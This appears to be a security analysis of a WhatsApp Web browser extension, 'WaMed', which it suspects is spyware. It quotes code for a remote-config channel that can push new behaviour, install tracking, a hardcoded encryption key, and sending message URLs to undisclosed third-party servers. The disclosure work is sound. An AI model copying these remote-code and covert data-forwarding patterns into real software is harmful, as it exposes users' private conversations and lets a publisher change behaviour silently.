WaMed

Every 10 minutes the background service worker fetches a JSON blob from code.wascript.com.br/config.json — a field explicitly named 'remote_code' in the hardcoded config object — and forwards the entire server response to the content script injected into WhatsApp Web via the Update_DomSelector message. The content script that receives and acts on this payload is absent from the analysis bundle, making it impossible to determine whether this channel delivers only DOM selectors or executable code. Combined with the internal IoC report naming this extension 'WaSteal', this constitutes a live remote instruction channel that can be repurposed at any time to push arbitrary behavior changes into every active installation.

const t = await (await fetch(`${n.remote_code}config.json`, {  method: "GET"})).json();return s("https://web.whatsapp.com/*", "Update_DomSelector", t), t;

On every install event the extension sends its unique runtime ID to backend-plugin.wascript.com.br, giving the publisher a real-time registry of all active installations keyed by extension ID. The server response can instruct the background script to open a new browser tab to any arbitrary URL, creating a targeted push-notification capability — the publisher can deliver URLs to specific extension instances immediately after install without any user action.

// On chrome.runtime.onInstalled:await fetch(`${n.backend_plugin}api/urls/install/${chrome.runtime.id}`, {  method: "GET"})// Response can open a new tab to any URL returned by the server

The extension's internal brand name is 'watidy', not 'WaMed' as listed in the Chrome Web Store, indicating a white-labeled payload rebranded for distribution. A hardcoded symmetric encryption key (cript_key) is declared in the shared config object but is never referenced anywhere in the files present in this bundle — its only consumer is the missing content script, a pattern consistent with encrypting harvested data before exfiltration to evade content-based detection.

const n = {  name: "watidy",  version: "7.4.3.55",  cript_key: "ffce211a-7b07-4d91-ba5d-c40bb4034a83",  backend_plugin: "https://backend-plugin.wascript.com.br/",  backend: "https://painel-old.wascript.com.br/",  backend_utils: "https://backend-utils.wascript.com.br/",  webSocket: {    "multi-atendimento": "https://multi-atendimento.wascript.com.br",    "api-whatsapp": "https://api-whatsapp.wascript.com.br"  },  painel_cliente: "https://app.wascript.com.br",  audio_transcriber: "https://audio-transcriber.wascript.com.br/transcription",  remote_code: "https://code.wascript.com.br/",  midiaLimit: 50};

The bundled WPP Connect library sends URLs extracted from WhatsApp chat messages to three third-party servers (uppermesh.com.br, titanchat.com.br, cloudtrix.com.br) for link preview generation. None of these domains are affiliated with the publisher (extensao.store or wascript.com.br). The CWS data-collection disclosure is empty ('none declared'), yet the content of users' WhatsApp conversations — specifically every URL contained in messages — is transmitted to these external parties without user consent or disclosure.

d = i.config.linkPreviewApiServers || [  "https://cobrancas.uppermesh.com.br:8000",  "https://wajsapi.titanchat.com.br",  "https://wppc-linkpreview.cloudtrix.com.br"]// ...const o = `${n}/v1/link-preview/fetch-data.png?url=` + encodeURI(e)